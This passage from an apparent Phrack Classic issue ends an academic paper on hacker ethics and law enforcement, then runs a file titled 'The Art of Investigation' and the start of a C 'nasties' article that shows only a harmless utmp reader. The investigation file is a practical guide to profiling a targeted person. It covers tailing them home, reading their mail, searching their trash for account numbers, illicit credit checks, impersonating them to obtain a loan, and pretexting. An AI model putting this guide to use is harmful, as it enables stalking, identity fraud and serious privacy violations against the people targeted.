  1333. with dial-up access, the accrual of the information, the methods
  1334. used to acquire it, and the purposes to which it is put.  Another
  1335. hacker questioned the inclusion of religion and race in credit records.
  1336. Drake told me that he was concerned about the increasing amount of
  1337. information about individuals that is stored in large data banks,
  1338. and the inability of the individual to have much control over the
  1339. use of that information.  He suggests that the individual might be
  1340. co-owner of information collected about him or her, with control
  1341. over the use of that information.  He also says that an individual
  1342. should be free to withhold personal information, of course paying
  1343. the consequences of doing so (e.g., not getting a drivers license
  1344. or credit card).  In fact, all Federal Government forms are required
  1345. to contain a Privacy Act Statement that states how the information
  1346. being collected will be used and, in some cases, giving the option
  1347. of withholding the information.
  1348.  
  1349. Goldstein has also challenged the practices of law enforcement agencies
  1350. in their attempt to crack down on hackers (Goldstein90).  He said
  1351. that all incoming and outgoing electronic mail used by ``Phrack''
  1352. was monitored before the newsletter was shutdown by authorities.
  1353. ``Had a printed magazine been shut down in this fashion after having
  1354. all of their mail opened and read, even the most thick-headed
  1355. sensationalist media types would have caught on: hey, isn't that
  1356. a violation of the First Amendment?''  He also cites the shutdown
  1357. of several bulletin boards as part of Operation Sun Devil, and quotes
  1358. the administrator of the bulletin board Zygot as saying ``Should
  1359. I start reading my users' mail to make sure they aren't saying anything
  1360. naughty?  Should I snoop through all the files to make sure everyone
  1361. is being good?  This whole affair is rather chilling.''  The
  1362. administrator for the public system The Point wrote ``Today, there
  1363. is no law or precedent which affords me ... the same legal rights
  1364. that other common carriers have against prosecution should some other
  1365. party (you) use my property (The Point) for illegal activities.
  1366. That worries me ...''
  1367.  
  1368. About 40 personal computer systems and 23,000 data disks were seized
  1369. under Operation Sun Devil, a two-year investigation involving the
  1370. FBI, Secret Service, and other federal and local law enforcement
  1371. officials.  In addition, the Secret Service acknowledges that its
  1372. agents, acting as legitimate users, had secretly monitored computer
  1373. bulletin boards (Markoff90a).  Markoff reports that California
  1374. Representative Don Edwards, industry leader Mitchell Kapor, and civil
  1375. liberties advocates are alarmed by these government actions, saying
  1376. that they challenge freedom of speech under the First Amendment and
  1377. protection against searches and seizures under the Fourth Amendment.
  1378. Markoff asks: ``Will fear of hackers bring oppression?''
  1379.  
  1380. John Barlow writes ``The Secret Service may actually have done a
  1381. service for those of us who love liberty.  They have provided us
  1382. with a devil.  And devils, among their other galvanizing virtues,
  1383. are just great for clarifying the issues and putting iron in your
  1384. spine,'' (Barlow90).  Some of the questions that Barlow says need
  1385. to be addressed include ``What are data and what is free speech?
  1386. How does one treat property which has no physical form and can be
  1387. infinitely reproduced?  Is a computer the same as a printing press?''
  1388. Barlow urges those of us who understand the technology to address
  1389. these questions, lest the answers be given to us by law makers and
  1390. law enforcers who do not.   Barlow and Kapor are constituting a
  1391. foundation to ``raise and disburse funds for education, lobbying,
  1392. and litigation in the areas relating to digital speech and the
  1393. extension of the Constitution into Cyberspace.''
  1394.  
  1395. 8.  Conclusions
  1396.  
  1397.  
  1398. Hackers say that it is our social responsibility to share information,
  1399. and that it is information hoarding and disinformation that are the
  1400. crimes.  This ethic of resource and information sharing contrasts
  1401. sharply with computer security policies that are based on authorization
  1402. and ``need to know.'' This discrepancy raises an interesting question:
  1403. Does the hacker ethic reflect a growing force in society that stands
  1404. for greater sharing of resources and information -- a reaffirmation
  1405. of basic values in our constitution and laws?  It is important that
  1406. we examine the differences between the standards of hackers, systems
  1407. managers, users, and the public.  These differences may represent
  1408. breakdowns in current practices, and may present new opportunities
  1409. to design better policies and mechanisms for making computer resources
  1410. and information more widely available.
  1411.  
  1412. The sentiment for greater information sharing is not restricted to
  1413. hackers.  In the best seller, ``Thriving on Chaos,'' Tom Peters
  1414. (Peters87) writes about sharing within organizations: ``Information
  1415. hoarding, especially by politically motivated, power-seeking staffs,
  1416. has been commonplace throughout American industry, service and
  1417. manufacturing alike.  It will be an impossible millstone around the
  1418. neck of tomorrow's organizations.  Sharing is a must.''  Peters argues
  1419. that information flow and sharing is fundamental to innovation and
  1420. competitiveness.  On a broader scale, Peter Drucker (Drucker89) says
  1421. that the ``control of information by government is no longer possible.
  1422. Indeed, information is now transnational.  Like money, it has no
  1423. `fatherland.' ''
  1424.  
  1425. Nor is the sentiment restricted to people outside the computer security
  1426. field.  Harry DeMaio (DeMaio89) says that our natural urge is to
  1427. share information, and that we are suspicious of organizations and
  1428. individuals who are secretive.  He says that information is exchanged
  1429. out of ``want to know'' and mutual accommodation rather than ``need
  1430. to know.''  If this is so, then some of our security policies are
  1431. out of step with the way people work.  Peter Denning (DenningP89)
  1432. says that information sharing will be widespread in the emerging
  1433. worldwide networks of computers and that we need to focus on ``immune
  1434. systems'' that protect against mistakes in our designs and recover
  1435. from damage.
  1436.  
  1437. I began my investigation of hackers with the question, who are they
  1438. and what is their culture and discourse?  My investigation uncovered
  1439. some of their concerns, which provided the organizational structure
  1440. to this paper, and several suggestions for new actions that might
  1441. be taken.  My investigation also opened up a broader question:  What
  1442. conflict in society do hackers stand at the battle lines of?  Is
  1443. it owning or restricting information vs. sharing information -- a
  1444. tension between an age-old tradition of controlling information as
  1445. property and the Englightenment tradition of sharing and disseminating
  1446. information?  Is it controlling access based on ``need to know,''
  1447. as determined by the information provider, vs. ``want to know,''
  1448. as determined by the person desiring access?   Is it law enforcement
  1449. vs. freedoms granted under the First and Fourth Amendments?  The
  1450. answers to these questions, as well as those raised by Barlow on
  1451. the nature of information and free speech, are important because
  1452. they tell us whether our policies and practices serve us as well
  1453. as they might.  The issue is not simply hackers vs. system managers
  1454. or law enforcers; it is a much larger question about values and
  1455. practices in an information society.
  1456.  
  1457.  
  1458. Acknowledgments
  1459.  
  1460. I am deeply grateful to Peter Denning, Frank Drake, Nathan Estey,
  1461. Katie Hafner, Brian Harvey, Steve Lipner, Teresa Lunt, Larry Martin,
  1462. Gordon Meyer, Donn Parker, Morgan Schweers, Richard Stallman, and
  1463. Alex for their comments on earlier versions of this paper and helpful
  1464. discussions; to Richard Stallman for putting me in contact with
  1465. hackers; John Draper, Geoff Goodfellow, Brian Reid, Eugene Spafford,
  1466. Dave, Marcel, Mike, RGB, and the hackers for helpful discussions;
  1467. and Richard Pethia for a summary of some of his experiences at CERT.
  1468. The opinions expressed here, however, are my own and do not necessarily
  1469. represent those of the people mentioned above or of Digital Equipment
  1470. Corporation.
  1471.  
  1472.  
  1473. References
  1474.  
  1475.  
  1476. ACM90
  1477.   ``Just say no,'' Comm. ACM, Vol. 33, No. 5, May 1990, p. 477.
  1478.  
  1479. Baird87
  1480.   Bruce J. Baird, Lindsay L. Baird, Jr., and Ronald P. Ranauro, ``The
  1481.   Moral Cracker?,'' Computers and Security, Vol. 6, No. 6, Dec. 1987,
  1482.   p. 471-478.
  1483.  
  1484. Barlow90
  1485.   John Barlow, ``Crime and Puzzlement,'' June 1990, to appear in Whole
  1486.   Earth Review.
  1487.  
  1488. Corley89
  1489.   Eric Corley, ``The Hacking Fever,'' in Pamela Kane, V.I.R.U.S.
  1490.   Protection, Bantam Books, New York, 1989, p. 67-72.
  1491.  
  1492. DeMaio89
  1493.   Harry B. DeMaio, ``Information Ethics, a Practical Approach,''
  1494.   Proc. of the 12th National Computer Security Conference, 1989,
  1495.   p. 630-633.
  1496.  
  1497. DenningP89
  1498.   Peter J. Denning, ``Worldnet,'' American Scientist, Vol. 77, No. 5,
  1499.   Sept.-Oct., 1989.
  1500.  
  1501. DenningP90
  1502.   Peter J. Denning, Computers Under Attack, ACM Press, 1990.
  1503.  
  1504. Dibbel90
  1505.   Julian Dibbel, ``Cyber Thrash,'' SPIN, Vol. 5, No. 12, March 1990.
  1506.  
  1507. Drucker89
  1508.   Peter F. Drucker, The New Realities, Harper and Row, New York, 1989.
  1509.  
  1510. Felsenstein86
  1511.   Lee Felsenstein, ``Real Hackers Don't Rob Banks,'' in full report on
  1512.   ACM Panel on Hacking (Lee86).
  1513.  
  1514. Frenkel87
  1515.   Karen A. Frenkel, ``Brian Reid, A Graphics Tale of a Hacker
  1516.   Tracker,'' Comm. ACM, Vol. 30, No. 10, Oct. 1987, p. 820-823.
  1517.  
  1518. Goldstein89
  1519.   Emmanuel Goldstein, ``Hackers in Jail,'' 2600 Magazine, Vol. 6, No. 1,
  1520.   Spring 1989.
  1521.  
  1522. Goldstein90
  1523.   Emmanuel Goldstein, ``For Your Protection,'' 2600 Magazine, Vol. 7,
  1524.   No. 1, Spring 1990.
  1525.  
  1526. Goodfellow83
  1527.   Geoffrey S. Goodfellow, ``Testimony Before the Subcommittee on
  1528.   Transportation, Aviation, and Materials on the Subject of
  1529.   Telecommunications Security and Privacy,'' Sept. 26, 1983.
  1530.  
  1531. Hafner90
  1532.   Katie Hafner, ``Morris Code,'' The New Republic, Feb. 16, 1990,
  1533.   p. 15-16.
  1534.  
  1535. Harpers90
  1536.   ``Is Computer Hacking a Crime?" Harper's, March 1990, p. 45-57.
  1537.  
  1538. Harvey86
  1539.   Brian Harvey, ``Computer Hacking and Ethics,'' in full report on
  1540.   ACM Panel on Hacking (Lee86).
  1541.  
  1542. HollingerLanza-Kaduce88
  1543.   Richard C. Hollinger and Lonn Lanza-Kaduce, ``The Process of
  1544.   Criminalization: The Case of Computer Crime Laws,'' Criminology,
  1545.   Vol. 26, No. 1, 1988, p. 101-126.
  1546.  
  1547. Huebner89
  1548.   Hans Huebner, ``Re: News from the KGB/Wiley Hackers,'' RISKS Digest,
  1549.   Vol. 8, Issue 37, 1989.
  1550.  
  1551. Landreth89
  1552.   Bill Landreth, Out of the Inner Circle, Tempus, Redmond, WA, 1989.
  1553.  
  1554. Lee86
  1555.   John A. N. Lee, Gerald Segal, and Rosalie Stier, ``Positive
  1556.   Alternatives: A Report on an ACM Panel on Hacking,'' Comm. ACM,
  1557.   Vol. 29, No. 4, April 1986, p. 297-299; full report available from
  1558.   ACM Headquarters, New York.
  1559.  
  1560. Levy84
  1561.   Steven Levy, Hackers, Dell, New York, 1984.
  1562.  
  1563. Markoff90
  1564.   John Markoff, ``Self-Proclaimed `Hacker' Sends Message to Critics,''
  1565.   The New York Times, March 19, 1990.
  1566.  
  1567. Markoff90a
  1568.   John Markoff, ``Drive to Counter Computer Crime Aims at Invaders,''
  1569.   The New York Times, June 3, 1990.
  1570.  
  1571. Martin89
  1572.   Larry Martin, ``Unethical `Computer' Behavior: Who is Responsible?,''
  1573.   Proc. of the 12th National Computer Security Conference, 1989.
  1574.  
  1575. Meyer89
  1576.   Gordon R. Meyer, The Social Organization of the Computer Underground,
  1577.   Master's thesis, Dept. of Sociology, Northern Illinois Univ., Aug.
  1578.   1989.
  1579.  
  1580. MeyerThomas90
  1581.   Gordon Meyer and Jim Thomas, ``The Baudy World of the Byte Bandit:
  1582.   A Postmodernist Interpretation of the Computer Underground,'' Dept.
  1583.   of Sociology, Northern Illinois Univ., DeKalb, IL, March 1990.
  1584.  
  1585. Peters87
  1586.   Tom Peters, Thriving on Chaos, Harper & Row, New York, Chapter VI, S-3,
  1587.   p. 610, 1987.
  1588.  
  1589. Spafford89
  1590.   Eugene H. Spafford, ``The Internet Worm, Crisis and Aftermath,''
  1591.   Comm. ACM, Vol. 32, No. 6, June 1989, p. 678-687.
  1592.  
  1593. Stallman84
  1594.   Richard M. Stallman, Letter to ACM Forum, Comm. ACM, Vol. 27,
  1595.   No. 1, Jan. 1984, p. 8-9.
  1596.  
  1597. Stallman90
  1598.   Richard M. Stallman, ``Against User Interface Copyright'' to appear
  1599.   in Comm. ACM.
  1600.  
  1601. Steele83
  1602.   Guy L. Steele, Jr., Donald R. Woods, Raphael A. Finkel, Mark R.
  1603.   Crispin, Richard M. Stallman, and Geoffrey S. Goodfellow,  The
  1604.   Hacker's Dictionary, Harper & Row, New York, 1983.
  1605.  
  1606. Stoll90
  1607.   Clifford Stoll, The Cuckoo's Egg, Doubleday, 1990.
  1608.  
  1609. Thomas90
  1610.   Jim Thomas, ``Review of The Cuckoo's Egg,'' Computer Underground
  1611.   Digest, Issue #1.06, April 27, 1990.
  1612.  
  1613. ThomasMeyer90
  1614.   Jim Thomas and Gordon Meyer, ``Joe McCarthy in a Leisure Suit:
  1615.   (Witch)Hunting for the Computer Underground,''  Unpublished
  1616.   manuscript, Department of Sociology, Northern Illinois University,
  1617.   DeKalb, IL, 1990; see also the Computer Underground Digest, Vol.
  1618.   1, Issue 11, June 16, 1990.
  1619.  
  1620. _______________________________________________________________________________
  1621.  
  1622.                               ==Phrack Classic==
  1623.  
  1624.                      Volume Three, Issue 32, File #4 of 12
  1625.  
  1626.  
  1627. *****         T H E    A R T    O F    I N V E S T I G A T I O N         *****
  1628. *****                                                                    *****
  1629. *****                                                                    *****
  1630. *****                       Brought to You By                            *****
  1631. *****                                                                    *****
  1632. *****                          The Butler                                *****
  1633. *****                                                                    *****
  1634. *****                           10/31/90                                 *****
  1635. *****                                                                    *****
  1636. *****                                                                    *****
  1637.  
  1638. There are many ways to obtain information about individuals.  I am going to
  1639. cover some of the investigative means of getting the low down on people whom
  1640. you wish to know more about.
  1641.  
  1642. Some of the areas I will cover are:
  1643.  
  1644. Social Security Checks
  1645. Driving/Vehicular Records
  1646. Police Reports
  1647. FBI Records
  1648. Insurance Records
  1649. Legal Records
  1650. Credit Bureau Checks
  1651. Probate Records
  1652. Real Estate Records
  1653. Corporate Records
  1654. Freedom Of Information Act
  1655. Governmental Agency Records
  1656. Maps
  1657. Tax Records
  1658.  
  1659. To obtain information from some organizations or some individuals one must be
  1660. able to "BULLSHIT"!!! Not only by voice but in writing.  Many times you must
  1661. write certain governmental bodies requesting info and it can only be done in
  1662. writing.  I can't stress enough the need for proper grammer and spelling.
  1663.  
  1664. For you to obtain certain information about another person you must first
  1665. get a few KEY pieces of info to make your investigation easier.  The persons
  1666. Full Name, Social Security Number, Date & Place of Birth will all make your
  1667. search easier and more complete.
  1668.  
  1669. First of all in most cases you will know the persons name you want to invest-
  1670. igate.  If not you must obtain it any way you can.  First you could follow them
  1671. to their home and get their address.  Then some other time when they are gone
  1672. you could look at their mail or dig through their trash to get their Full Name.
  1673. While in their trash you might even be able to dig up more interesting info
  1674. like:  Bank Accout Numbers, Credit Card Numbers, Social Security Number, Birth
  1675. Day, Relatives Names, Long Distance Calls Made, etc.
  1676.  
  1677. If you can't get to their trash for some reason take their address to your
  1678. local library and check it against the POLKS and COLES Directories.  This
  1679. should provide you with their Full Name, Phone Number, Address, and how long
  1680. they have lived at the current location.
  1681.  
  1682. You can also check the Local Phone Book, Directory Assistance, City Directories,
  1683. Post Office, Voter Registration, Former Neighbors, Former Utilities (water, gas,
  1684. electric, phone, cable, etc.)
  1685.  
  1686. If you know someone who works at a bank or car dealer you could have them run
  1687. a credit check which will reveal all of their credit cards and if they have
  1688. ever had any late payments or applied for any loans. If you are brave enough
  1689. you could even apply for a loan impersonating the individual under investigation
  1690.  
  1691. The Credit Bureau also has Sentry Services that can provide deceased social
  1692. security numbers, postal drop box address and known fraudulent information.
  1693.  
  1694. You can get an individuals driving record by sending a letter to your states
  1695. Department of Revenue, Division of Vehicles.  You can also get the following:
  1696.  
  1697. Driver Control Bureau
  1698. For Driving Record send Name, Address, Date of Birth and usually a $1 process-
  1699. ing fee for a 5 year record.
  1700.  
  1701. Titles & Registration Bureau
  1702. For ownership information (current and past).
  1703.  
  1704. Driver License Examination Bureau
  1705. To see what vision was rated.
  1706.  
  1707. Motor Carrier Inspection & Registration Bureau
  1708. To check on licensing and registration of trucks/trucking companies.
  1709.  
  1710. Revocation Dept
  1711. Can verify if someone's driver's license has ever been suspended or revoked.
  1712.  
  1713. You can even obtain a complete vehicle history by sending the vehicle descrip-
  1714. tion, identification # for the last registered owner, and a small fee.  Send
  1715. this info to your states Dept of Vehicles.  It is best to contact them first
  1716. to get their exact address and fees.  I would advise using a money orders and
  1717. a P.O. Box so they cannot trace it to you without a hassle.
  1718.  
  1719. Police Records
  1720.  
  1721. All Police and Fire Records are Public record unless the city is involved.
  1722. You can usually get everything available from the police dept including:
  1723. Interviews, maps, diagrams, misc reports, etc.
  1724.  
  1725.  
  1726. FBI Records
  1727.  
  1728. If the individual you are inquiring about is deceased the FBI will provide
  1729. some info if you give them Full Name, SSN, Date & Place of Birth.  Contact
  1730. you local FBI office to get the details.
  1731.  
  1732.  
  1733. Real Estate Records
  1734.  
  1735. Recorder of Deeds offices in each county maintain land ownership records.
  1736. Most are not computerized and you have to manually search.  Then you must
  1737. review microfilm/fiche for actual deeds of trust, quit claim deeds,
  1738. assignments, mortgage, liens, etc.
  1739.  
  1740. A title company can run an Ownership & Equity (O&E) search for a fee ($80-$100)
  1741. which will show ownership, mortgage info, easements, taxes owned, taxes
  1742. assessed, etc.
  1743.  
  1744. Most county assessors will provide an address and value of any real property
  1745. if you request a search by name.
  1746.  
  1747.  
  1748. Social Security Records
  1749.  
  1750. Social Security Administrator
  1751. Office of Central Records Operations
  1752. 300 North Greene Street
  1753. Baltimore, Maryland 21201
  1754. 301-965-8882
  1755.  
  1756. Title II and Title XVI disability claims records, info regarding total earnings
  1757. for each year, detailed earnings information show employer, total earnings, and
  1758. social security paid for each quarter by employer.
  1759.  
  1760. Prices are approximately as follows:
  1761.  
  1762. 1st year of records                        $15.00
  1763. 2nd-5th year of records                    $ 2.50 per person
  1764. 6th-10th year of records                   $ 2.00 per person
  1765. 11th-15th year of records                  $ 1.50 per person
  1766. 16th-on year of records                    $ 1.00 per person
  1767.  
  1768. **  Call for verification of these prices.  **
  1769.  
  1770. Social Security records are a great source of information when someone has
  1771. been relatively transient in their work, or if they are employed out of a
  1772. union hall.
  1773.  
  1774. If you want to review a claim file, direct your request to the Baltimore
  1775. office.  They will send the file to the social security office in your city
  1776. for you to review and decide what you want copies of.
  1777.  
  1778. The first three digits of a social security number indicate the state of
  1779. application.
  1780.  
  1781.                  The Social Security Number
  1782.  
  1783. SSA has continually emphasized the fact that the SSN identifies a particular
  1784. record only and the Social Security Card indicates the person whose record is
  1785. identified by that number. In no way can the Social Security Card identify
  1786. the bearer. From 1946 to 1972 the legend "Not for Identification" was printed
  1787. on the face of the card.  However, many people ignored the message and the
  1788. legend was eventually dropped.  The social security number is the most widely
  1789. used and carefully controlled number in the country, which makes it an
  1790. attractive identifier.
  1791.  
  1792. With the exception of the restrictions imposed on Federal and some State and
  1793. local organizations by the Privacy Act of 1974, organizations requiring a
  1794. unique identifier for purposes of controlling their records are not prohibited
  1795. from using (with the consent of the holder) the SSN. SSA records are
  1796. confidential and knowledge of a person's SSN does not give the user access to
  1797. information in SSA files which is confidential by law.
  1798.  
  1799. Many commercial enterprises have used the SSN in various promotional efforts.
  1800. These uses are not authorized by SSA, but SSA has no authority to prohibit
  1801. such activities as most are not illegal. Some of these unauthorized uses are:
  1802. SSN contests; skip-tracers; sale or distribution of plastic or metal cards;
  1803. pocketbook numbers (the numbers used on sample social security cards in
  1804. wallets); misleading advertising, commercial enterprises charging fees for SSN
  1805. services; identification of personal property.
  1806.  
  1807. The Social Security Number (SSN) is composed of 3 parts, XXX-XX-XXXX, called
  1808. the Area, Group, and Serial.  For the most part, (there are exceptions), the
  1809. Area is determined by where the individual APPLIED for the SSN (before 1972)
  1810. or RESIDED at time of application (after 1972). The areas are assigned as
  1811. follows:
  1812.  
  1813. 000     unused   387-399 WI    528-529 UT
  1814. 001-003 NH       400-407 KY    530     NV
  1815. 004-007 ME       408-415 TN    531-539 WA
  1816. 008-009 VT       416-424 AL    540-544 OR
  1817. 010-034 MA       425-428 MS    545-573 CA
  1818. 035-039 RI       429-432 AR    574     AK
  1819. 040-049 CT       433-439 LA    575-576 HI
  1820. 050-134 NY       440-448 OK    577-579 DC
  1821. 135-158 NJ       449-467 TX    580     VI Virgin Islands
  1822. 159-211 PA       468-477 MN    581-584 PR Puerto Rico
  1823. 212-220 MD       478-485 IA    585     NM
  1824. 221-222 DE       486-500 MO    586     PI Pacific Islands*
  1825. 223-231 VA       501-502 ND    587-588 MS
  1826. 232-236 WV       503-504 SD    589-595 FL
  1827. 237-246 NC       505-508 NE    596-599 PR Puerto Rico
  1828. 247-251 SC       509-515 KS    600-601 AZ
  1829. 252-260 GA       516-517 MT    602-626 CA
  1830. 261-267 FL       518-519 ID    *Guam, American Samoa,
  1831. 268-302 OH       520     WY     Northern Mariana Islands,
  1832. 303-317 IN       521-524 CO     Philippine Islands
  1833. 318-361 IL       525     NM
  1834. 362-386 MI       526-527 AZ
  1835.  
  1836. 627-699 unassigned, for future use
  1837.  
  1838. 700-728 Railroad workers through 1963, then discontinued
  1839. 729-899 unassigned, for future use
  1840. 900-999 not valid SSNs, but were used for program purposes
  1841.           when state aid to the aged, blind and disabled was
  1842.           converted to a federal program administered by SSA.
  1843.  
  1844. As the Areas assigned to a locality are exhausted, new areas from the pool are
  1845. assigned.  This is why some states have non-contiguous groups of Areas.
  1846.  
  1847. The Group portion of the SSN has no meaning other than to determine whether or
  1848. not a number has been assigned. SSA publishes a list every month of the
  1849. highest group assigned for each SSN Area.  The order of assignment for the
  1850. Groups is: odd numbers under 10, even numbers over 9, even numbers under 9
  1851. except for 00 which is never used, and odd numbers over 10. For example, if the
  1852. highest group assigned for area 999 is 72, then we know that the number
  1853. 999-04-1234 is an invalid number because even Groups under 9 have not yet been
  1854. assigned.
  1855.  
  1856. The Serial portion of the SSN has no meaning. The Serial is not assigned in
  1857. strictly numerical order. The Serial 0000 is never assigned.
  1858.  
  1859. Before 1973, Social Security Cards with pre-printed numbers were issued to
  1860. each local SSA office. The numbers were assigned by the local office. In 1973,
  1861. SSN assignment was automated and outstanding stocks of pre-printed cards were
  1862. destroyed.  All SSNs are now assigned by computer from headquarters.  There
  1863. are rare cases in which the computer system can be forced to accept a manual
  1864. assignment such as a person refusing a number with 666 in it.
  1865.  
  1866. A pamphlet entitled "The Social Security Number" (Pub. No.05-10633) provides
  1867. an explanation of the SSN's structure and the method of assigning and
  1868. validating Social Security numbers.
  1869.  
  1870.  
  1871. Tax Records
  1872.  
  1873. If you can find out who does the individuals taxes you might be able to get
  1874. copies from them with the use of creative social engineering.
  1875.  
  1876. If you want to run a tax lien search there is a service called Infoquest.
  1877. 1-800-777-8567 for a fee.  Call with a specific request.
  1878.  
  1879.  
  1880. Post Office Records
  1881.  
  1882. If you have an address for someone that is not current, always consider writing
  1883. a letter to the postmaster of whatever post office branch services the zip code
  1884. of the missing person.  Provide them the name and the last known address and
  1885. simply ask for the current address.  There might be a $1 fee for this so it
  1886. would be wise to call first.
  1887.  
  1888. City Directory, Polk's, Cole's, etc.
  1889.  
  1890. Information in these directories is contained alphabetically by name,
  1891. geographically by street address, and numerically by telephone number, so if
  1892. you have any of those three pieces of info, a check can be done.  The Polk's
  1893. directory also shows whether the person owns their home or rents, their marital
  1894. status, place of employment, and a myriad of other tidbits of information.
  1895. However, these books are not the be-all and end-all of the information as they
  1896. are subject to public and corporate response to surveys.  These directories are
  1897. published on a nationwide basis so if you are looking for someone outside of
  1898. your area, simply call the public library in the area you have an interest and
  1899. they also can perform a crisscross check for you.
  1900.  
  1901. You can also call a service owned by Cole's called the National Look up Library
  1902. at 402-473-9717 and either give a phone number and get the name & address or
  1903. give the address and get the name and phone number.  This is only available to
  1904. subscribers, which costs $183.00 dollars for 1991.  A subscriber gets two free
  1905. lookups per day and everyone after that costs $1.25.  A subscriber can also mail
  1906. in a request for a lookup to:
  1907.  
  1908. National Look Up Library
  1909. 901 W. Bond Street
  1910. Lincoln, NE 68521-3694
  1911.  
  1912. A company called Cheshunoff & Company can, for a $75 fee, obtain a 5-year
  1913. detailed financial analysis of any bank.
  1914.  
  1915. 505 Barton Springs Road
  1916. Austin, Texas 78704
  1917. 512-472-2244
  1918.  
  1919. Professional Credit Checker & Nationwide SSN-locate.
  1920.  
  1921. !Solutions! Publishing Co.
  1922. 8016 Plainfield Road
  1923. Cincinnati, Ohio 45236
  1924. 513-891-6145
  1925. 1-800-255-6643
  1926.  
  1927. Top Secret Manuals
  1928.  
  1929. Consumertronics
  1930. 2011 Crescent Drive
  1931. P.O. Drawer 537-X
  1932. Alamogordo, New Mexico 88310
  1933. 505-434-0234
  1934.  
  1935.  
  1936. Federal Government Information Center is located at
  1937.  
  1938. 1520 Market Street
  1939. St. Louis, Missouri
  1940. 1-800-392-7711
  1941.  
  1942.  
  1943. U.S. Dept of Agriculture has located aerial photos of every inch of the United
  1944. States.
  1945.  
  1946. 2222 West 2300 S.
  1947. P.O. Box 36010
  1948. Salt Lake City, Utah 84130
  1949. 801-524-5856
  1950.  
  1951.  
  1952. To obtain general information regarding registered agent, principals, and good
  1953. standing  status, simply call the Corporate Division of the Secretary of State
  1954. and they will provide that information over the phone.  Some corporate divisions
  1955. are here:
  1956.  
  1957. Arkansas Corporate Division   501-371-5151
  1958. Deleware Corporate Division   302-736-3073
  1959. Georgia Corporate Division    404-656-2817
  1960. Indiana Corporate Division    317-232-6576
  1961. Kansas Corporate Division     913-296-2236
  1962. Louisiana Corporate Division  504-925-4716
  1963. Missouri Corporate Division   314-751-4936
  1964. New York Corporate Division   518-474-6200
  1965. Texas Corporate Division      512-475-3551
  1966.  
  1967.  
  1968. Freedom Of Information
  1969.  
  1970. The Freedom of Information Act allows the public to request information
  1971. submitted to, or generated by, all executive departments, military departments,
  1972. government or government controlled corporations, and regulatory agencies. Each
  1973. agency, as described above, publishes in the Federal Register, descriptions of
  1974. its central and field organizations and places where and how requests are to be
  1975. directed. Direct a letter to the appropriate person designated in the Federal
  1976. Register requesting reasonably described records be released to you pursuant to
  1977. the Freedom of Information Act.  Be sure to follow each agency's individually
  1978. published rules which state the time, place, fees, and procedures for the
  1979. provisions of information.  The agency should promptly respond.
  1980.  
  1981. How to Find Information About Companies, Ed. II, 1981, suggests, "Government
  1982. personnel you deal with sometimes become less helpful if you approach the
  1983. subject by threatening the Freedom of Information Act action - it's best to ask
  1984. for the material informally first."  While this will probably enable you to find
  1985. the correct person to send your request to, be prepared to spend at least half
  1986. an hour on the phone talking to several people before you find the person who
  1987. can help you.  The book also has a brief description of what each governmental
  1988. agency handles.
  1989.  
  1990. If you want to see if someone you are trying to locate is a veteran, has a
  1991. federal VA loan, or receives some sort of disability benefit, use Freedom
  1992. of Information and provide the person's SSN.
  1993.  
  1994. You will get a bill but you can ask for a fee waiver if this contributes to a
  1995. public understanding of the operation of the government.  You can also request
  1996. an opportunity to go through the files yourself and then decide what you want
  1997. copied.
  1998.  
  1999.  
  2000. Insurance Records
  2001.  
  2002. PIP carrier records (may contain statements, medical records, new doctors/
  2003. hospital names,  records of disability payments, adjuster's opinions,
  2004. applications for insurance coverage, other claim info, etc.)
  2005.  
  2006. Health insurance records (may contain medical records, record of bills, new
  2007. doctors/hospital names, pre-existing conditions information, info regarding
  2008. other accidetns/injuries, etc.)
  2009.  
  2010. Often you will have to go through the claims office, the underwriting dept, and
  2011. the business office to get complete records as each individual dept maintains
  2012. its own seperate files.
  2013.  
  2014.  
  2015. Workers Compensation
  2016.  
  2017. Some states will let you simply request records.  Just submit your request
  2018. including the SSN and Birthdate, to the Department of Human Resources, Division
  2019. of Worker's Compensation.  They will photocopy the records and send you the
  2020. copies.  Other states require an authorization to obtain these records.
  2021.  
  2022.  
  2023. You can always call your local Private Investigator pretending you are a
  2024. student doing a research paper on the methods of getting personal information
  2025. about people or even trash his place to find tips on tracking down people.
  2026.  
  2027. I hope this PHILE helps you in one way or another, if not, maybe a future PHILE
  2028. by The Butler will...........
  2029.  
  2030.  
  2031.                                         Till Next Time,
  2032.  
  2033.  
  2034.                                         The Butler...
  2035. _______________________________________________________________________________
  2036.  
  2037.                               ==Phrack Classic==
  2038.  
  2039.                      Volume Three, Issue 32, File #5 of 12
  2040.  
  2041.  
  2042.         *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
  2043.         %P                                                           P%
  2044.         %H                  C UNIX `nasties' PART I                  H%
  2045.         %A                            by                             A%
  2046.         %Z             Sir Hackalot of PHAZE (10/20/90)              Z%
  2047.         %E                                                           E%
  2048.         *%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
  2049.  
  2050.  
  2051. o Purpose of this file:
  2052.  
  2053.         The purpose of this file is to share small C programs for the Unix
  2054.         System V and/or BSD 4.3 operating systems which as in logical terms,
  2055.         "Nasty".  This "Nasty" can be termed better as Annoyance programs
  2056.         or tricky programs.
  2057.  
  2058.         The purpose of this text however, is NOT to teach one how to program
  2059.         in C and or how to use the C compiler on Unix systems.  This textfile
  2060.         assumes you have a working knowledge of programming with C in the
  2061.         UNIX environment.
  2062.  
  2063.  
  2064.  
  2065. o The UTMP Reader:
  2066.   ~~~~~~~~~~~~~~~~
  2067.  
  2068.         First, I would like to start this text off by posting in a generic
  2069.         /etc/utmp reader.  The /etc/utmp reader is essential for applications
  2070.         that deal with all the users online at a given time.
  2071.  
  2072.         Here is the source:
  2073.  
  2074. - - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
  2075.  
  2076.  
  2077. /* WhatTTY -- Generic WHO
  2078. UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
  2079.  
  2080. This is basically a skeleton program that is just a base for any UTMP
  2081. operations.
  2082.  
  2083. This is the skeleton that PhaZe(soft) uses for anything that deals
  2084. with reading the utmp file, such as MBS, SEND, VW, MME, and other
  2085. utilities.
  2086.  
  2087. Applications: You can use this when you need to do something to
  2088. everyone online, or when you need some sort of data from utmp, wtmp
  2089. or any file that is like utmp.
  2090. */
  2091.  
  2092. #include <stdio.h>
  2093. #include <sys/types.h> /* This is the key to the whole thing */
  2094. #include <utmp.h>
  2095. #include <fcntl.h>
  2096.  
  2097.  
  2098. main()
  2099. {
  2100.         int handle;
  2101.         char *etc = "/etc/utmp";
  2102.         struct utmp user;
  2103.  
